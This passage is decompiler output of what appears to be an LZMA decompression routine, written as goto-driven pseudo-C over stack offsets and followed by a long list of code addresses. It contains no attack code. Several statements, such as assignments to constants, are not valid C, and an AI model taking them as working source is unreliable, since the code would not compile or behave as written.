                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t156 = __ebp - 0x70;
                                                                                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t156;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											while(1) {
                                                                                                                          												L48:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t170 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t170;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													goto L46;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L54:
                                                                                                                          											_t173 = __ebp - 0x34;
                                                                                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          											__eflags =  *_t173;
                                                                                                                          											goto L55;
                                                                                                                          										case 0xf:
                                                                                                                          											L58:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xf;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t203 = __ebp - 0x70;
                                                                                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t203;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L60:
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												L55:
                                                                                                                          												__al =  *(__ebp - 0x44);
                                                                                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          												goto L56;
                                                                                                                          											}
                                                                                                                          											L61:
                                                                                                                          											__eax =  *(__ebp - 0x58);
                                                                                                                          											__edx = __ebx + __ebx;
                                                                                                                          											__ecx =  *(__ebp - 0x10);
                                                                                                                          											__esi = __edx + __eax;
                                                                                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edi = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												_t217 = __edx + 1; // 0x1
                                                                                                                          												__ebx = _t217;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edi;
                                                                                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L60;
                                                                                                                          											} else {
                                                                                                                          												goto L58;
                                                                                                                          											}
                                                                                                                          										case 0x10:
                                                                                                                          											L109:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x10;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t365 = __ebp - 0x70;
                                                                                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t365;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											goto L111;
                                                                                                                          										case 0x11:
                                                                                                                          											L69:
                                                                                                                          											__esi =  *(__ebp - 0x58);
                                                                                                                          											 *(__ebp - 0x84) = 0x12;
                                                                                                                          											while(1) {
                                                                                                                          												 *(_t613 - 0x54) = _t606;
                                                                                                                          												goto L133;
                                                                                                                          											}
                                                                                                                          										case 0x12:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												 *(__ebp - 0x84) = 0x13;
                                                                                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          												while(1) {
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											__eflags = __eax;
                                                                                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          											goto L130;
                                                                                                                          										case 0x13:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												_t469 = __ebp - 0x58;
                                                                                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          												__eflags =  *_t469;
                                                                                                                          												 *(__ebp - 0x30) = 0x10;
                                                                                                                          												 *(__ebp - 0x40) = 8;
                                                                                                                          												L144:
                                                                                                                          												 *(__ebp - 0x7c) = 0x14;
                                                                                                                          												goto L145;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											 *(__ebp - 0x30) = 8;
                                                                                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          											L130:
                                                                                                                          											 *(__ebp - 0x58) = __eax;
                                                                                                                          											 *(__ebp - 0x40) = 3;
                                                                                                                          											goto L144;
                                                                                                                          										case 0x14:
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          											__eax =  *(__ebp - 0x80);
                                                                                                                          											 *(_t613 - 0x88) = _t533;
                                                                                                                          											goto L1;
                                                                                                                          										case 0x15:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          											__al = __al & 0x000000fd;
                                                                                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											goto L120;
                                                                                                                          										case 0x16:
                                                                                                                          											__eax =  *(__ebp - 0x30);
                                                                                                                          											__eflags = __eax - 4;
                                                                                                                          											if(__eax >= 4) {
                                                                                                                          												_push(3);
                                                                                                                          												_pop(__eax);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x40) = 6;
                                                                                                                          											__eax = __eax << 7;
                                                                                                                          											 *(__ebp - 0x7c) = 0x19;
                                                                                                                          											 *(__ebp - 0x58) = __eax;
                                                                                                                          											goto L145;
                                                                                                                          										case 0x17:
                                                                                                                          											L145:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											 *(__ebp - 0x50) = 1;
                                                                                                                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          											goto L149;
                                                                                                                          										case 0x18:
                                                                                                                          											L146:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x18;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t484 = __ebp - 0x70;
                                                                                                                          											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t484;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L148:
                                                                                                                          											_t487 = __ebp - 0x48;
                                                                                                                          											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                          											__eflags =  *_t487;
                                                                                                                          											L149:
                                                                                                                          											__eflags =  *(__ebp - 0x48);
                                                                                                                          											if( *(__ebp - 0x48) <= 0) {
                                                                                                                          												__ecx =  *(__ebp - 0x40);
                                                                                                                          												__ebx =  *(__ebp - 0x50);
                                                                                                                          												0 = 1;
                                                                                                                          												__eax = 1 << __cl;
                                                                                                                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          												__eax =  *(__ebp - 0x7c);
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												while(1) {
                                                                                                                          													 *(_t613 - 0x88) = _t533;
                                                                                                                          													goto L1;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x50);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          											__eax =  *(__ebp - 0x58);
                                                                                                                          											__esi = __edx + __eax;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											__edi = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eax = __eax - __ecx;
                                                                                                                          												__edx = __edx + 1;
                                                                                                                          												__eflags = __edx;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          												 *(__ebp - 0x50) = __edx;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edi;
                                                                                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L148;
                                                                                                                          											} else {
                                                                                                                          												goto L146;
                                                                                                                          											}
                                                                                                                          										case 0x19:
                                                                                                                          											__eflags = __ebx - 4;
                                                                                                                          											if(__ebx < 4) {
                                                                                                                          												 *(__ebp - 0x2c) = __ebx;
                                                                                                                          												L119:
                                                                                                                          												_t393 = __ebp - 0x2c;
                                                                                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          												__eflags =  *_t393;
                                                                                                                          												L120:
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax;
                                                                                                                          												if(__eax == 0) {
                                                                                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          												__eax =  *(__ebp - 0x30);
                                                                                                                          												_t400 = __ebp - 0x60;
                                                                                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          												__eflags =  *_t400;
                                                                                                                          												goto L123;
                                                                                                                          											}
                                                                                                                          											__ecx = __ebx;
                                                                                                                          											__eax = __ebx;
                                                                                                                          											__ecx = __ebx >> 1;
                                                                                                                          											__eax = __ebx & 0x00000001;
                                                                                                                          											__ecx = (__ebx >> 1) - 1;
                                                                                                                          											__al = __al | 0x00000002;
                                                                                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          											__eflags = __ebx - 0xe;
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											if(__ebx >= 0xe) {
                                                                                                                          												__ebx = 0;
                                                                                                                          												 *(__ebp - 0x48) = __ecx;
                                                                                                                          												L102:
                                                                                                                          												__eflags =  *(__ebp - 0x48);
                                                                                                                          												if( *(__ebp - 0x48) <= 0) {
                                                                                                                          													__eax = __eax + __ebx;
                                                                                                                          													 *(__ebp - 0x40) = 4;
                                                                                                                          													 *(__ebp - 0x2c) = __eax;
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													L108:
                                                                                                                          													__ebx = 0;
                                                                                                                          													 *(__ebp - 0x58) = __eax;
                                                                                                                          													 *(__ebp - 0x50) = 1;
                                                                                                                          													 *(__ebp - 0x44) = 0;
                                                                                                                          													 *(__ebp - 0x48) = 0;
                                                                                                                          													L112:
                                                                                                                          													__eax =  *(__ebp - 0x40);
                                                                                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          														_t391 = __ebp - 0x2c;
                                                                                                                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          														__eflags =  *_t391;
                                                                                                                          														goto L119;
                                                                                                                          													}
                                                                                                                          													__eax =  *(__ebp - 0x50);
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													__esi = __edi + __eax;
                                                                                                                          													 *(__ebp - 0x54) = __esi;
                                                                                                                          													__ax =  *__esi;
                                                                                                                          													__ecx = __ax & 0x0000ffff;
                                                                                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          														__ecx = 0;
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          														__ecx = 1;
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          														__ebx = 1;
                                                                                                                          														__ecx =  *(__ebp - 0x48);
                                                                                                                          														__ebx = 1 << __cl;
                                                                                                                          														__ecx = 1 << __cl;
                                                                                                                          														__ebx =  *(__ebp - 0x44);
                                                                                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          														__cx = __ax;
                                                                                                                          														__cx = __ax >> 5;
                                                                                                                          														__eax = __eax - __ecx;
                                                                                                                          														__edi = __edi + 1;
                                                                                                                          														__eflags = __edi;
                                                                                                                          														 *(__ebp - 0x44) = __ebx;
                                                                                                                          														 *__esi = __ax;
                                                                                                                          														 *(__ebp - 0x50) = __edi;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x10) = __edx;
                                                                                                                          														0x800 = 0x800 - __ecx;
                                                                                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          														 *__esi = __dx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														L111:
                                                                                                                          														_t368 = __ebp - 0x48;
                                                                                                                          														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                          														__eflags =  *_t368;
                                                                                                                          														goto L112;
                                                                                                                          													} else {
                                                                                                                          														goto L109;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0xc);
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          													__ecx =  *(__ebp - 0x10);
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          													__ebx = __ebx | 0x00000001;
                                                                                                                          													__eflags = __ebx;
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													L101:
                                                                                                                          													_t338 = __ebp - 0x48;
                                                                                                                          													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                          													__eflags =  *_t338;
                                                                                                                          													goto L102;
                                                                                                                          												} else {
                                                                                                                          													goto L99;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__edx =  *(__ebp - 4);
                                                                                                                          											__eax = __eax - __ebx;
                                                                                                                          											 *(__ebp - 0x40) = __ecx;
                                                                                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                          											goto L108;
                                                                                                                          										case 0x1a:
                                                                                                                          											L56:
                                                                                                                          											__eflags =  *(__ebp - 0x64);
                                                                                                                          											if( *(__ebp - 0x64) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x1a;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x68);
                                                                                                                          											__al =  *(__ebp - 0x5c);
                                                                                                                          											__edx =  *(__ebp - 8);
                                                                                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          											 *( *(__ebp - 0x68)) = __al;
                                                                                                                          											__ecx =  *(__ebp - 0x14);
                                                                                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                          											__eax = __ecx + 1;
                                                                                                                          											__edx = 0;
                                                                                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          											__edx = _t192;
                                                                                                                          											goto L79;
                                                                                                                          										case 0x1b:
                                                                                                                          											L75:
                                                                                                                          											__eflags =  *(__ebp - 0x64);
                                                                                                                          											if( *(__ebp - 0x64) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x1b;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x14);
                                                                                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          												__eflags = __eax;
                                                                                                                          											}
                                                                                                                          											__edx =  *(__ebp - 8);
                                                                                                                          											__cl =  *(__eax + __edx);
                                                                                                                          											__eax =  *(__ebp - 0x14);
                                                                                                                          											 *(__ebp - 0x5c) = __cl;
                                                                                                                          											 *(__eax + __edx) = __cl;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__edx = 0;
                                                                                                                          											_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          											__edx = _t274;
                                                                                                                          											__eax =  *(__ebp - 0x68);
                                                                                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          											_t283 = __ebp - 0x64;
                                                                                                                          											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                          											__eflags =  *_t283;
                                                                                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          											L79:
                                                                                                                          											 *(__ebp - 0x14) = __edx;
                                                                                                                          											goto L80;
                                                                                                                          										case 0x1c:
                                                                                                                          											while(1) {
                                                                                                                          												L123:
                                                                                                                          												__eflags =  *(__ebp - 0x64);
                                                                                                                          												if( *(__ebp - 0x64) == 0) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__edx =  *(__ebp - 8);
                                                                                                                          												__cl =  *(__eax + __edx);
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												 *(__ebp - 0x5c) = __cl;
                                                                                                                          												 *(__eax + __edx) = __cl;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__edx = 0;
                                                                                                                          												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          												__edx = _t414;
                                                                                                                          												__eax =  *(__ebp - 0x68);
                                                                                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                          												__eflags =  *(__ebp - 0x30);
                                                                                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          												 *(__ebp - 0x14) = _t414;
                                                                                                                          												if( *(__ebp - 0x30) > 0) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													L80:
                                                                                                                          													 *(__ebp - 0x88) = 2;
                                                                                                                          													goto L1;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											 *(__ebp - 0x88) = 0x1c;
                                                                                                                          											goto L170;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L171:
                                                                                                                          								_t535 = _t534 | 0xffffffff;
                                                                                                                          								goto L172;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          0x00000000
                                                                                                                          0x00407068
                                                                                                                          0x00407068
                                                                                                                          0x0040706c
                                                                                                                          0x00407095
                                                                                                                          0x0040709f
                                                                                                                          0x0040706e
                                                                                                                          0x00407077
                                                                                                                          0x00407084
                                                                                                                          0x00407087
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x004073ce
                                                                                                                          0x004073ce
                                                                                                                          0x004073ce
                                                                                                                          0x004073d4
                                                                                                                          0x004073da
                                                                                                                          0x004073e0
                                                                                                                          0x004073fa
                                                                                                                          0x004073fd
                                                                                                                          0x00407403
                                                                                                                          0x0040740e
                                                                                                                          0x00407410
                                                                                                                          0x004073e2
                                                                                                                          0x004073e2
                                                                                                                          0x004073f1
                                                                                                                          0x004073f5
                                                                                                                          0x004073f5
                                                                                                                          0x0040741a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040741c
                                                                                                                          0x00407420
                                                                                                                          0x004075cf
                                                                                                                          0x004075e5
                                                                                                                          0x004075ed
                                                                                                                          0x004075f4
                                                                                                                          0x004075f6
                                                                                                                          0x004075fd
                                                                                                                          0x00407601
                                                                                                                          0x00407601
                                                                                                                          0x0040742c
                                                                                                                          0x00407433
                                                                                                                          0x0040743b
                                                                                                                          0x0040743e
                                                                                                                          0x00407441
                                                                                                                          0x00407441
                                                                                                                          0x00407447
                                                                                                                          0x00407447
                                                                                                                          0x00406be3
                                                                                                                          0x00406be3
                                                                                                                          0x00406be3
                                                                                                                          0x00406bec
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x00000000
                                                                                                                          0x00406bfd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c06
                                                                                                                          0x00406c09
                                                                                                                          0x00406c0c
                                                                                                                          0x00406c10
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c16
                                                                                                                          0x00406c19
                                                                                                                          0x00406c1b
                                                                                                                          0x00406c1c
                                                                                                                          0x00406c1f
                                                                                                                          0x00406c21
                                                                                                                          0x00406c22
                                                                                                                          0x00406c24
                                                                                                                          0x00406c27
                                                                                                                          0x00406c2c
                                                                                                                          0x00406c31
                                                                                                                          0x00406c3a
                                                                                                                          0x00406c4d
                                                                                                                          0x00406c50
                                                                                                                          0x00406c5c
                                                                                                                          0x00406c84
                                                                                                                          0x00406c86
                                                                                                                          0x00406c94
                                                                                                                          0x00406c94
                                                                                                                          0x00406c98
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c88
                                                                                                                          0x00406c88
                                                                                                                          0x00406c8b
                                                                                                                          0x00406c8c
                                                                                                                          0x00406c8c
                                                                                                                          0x00000000
                                                                                                                          0x00406c88
                                                                                                                          0x00406c62
                                                                                                                          0x00406c67
                                                                                                                          0x00406c67
                                                                                                                          0x00406c70
                                                                                                                          0x00406c78
                                                                                                                          0x00406c7b
                                                                                                                          0x00000000
                                                                                                                          0x00406c81
                                                                                                                          0x00406c81
                                                                                                                          0x00000000
                                                                                                                          0x00406c81
                                                                                                                          0x00000000
                                                                                                                          0x00406c9e
                                                                                                                          0x00406c9e
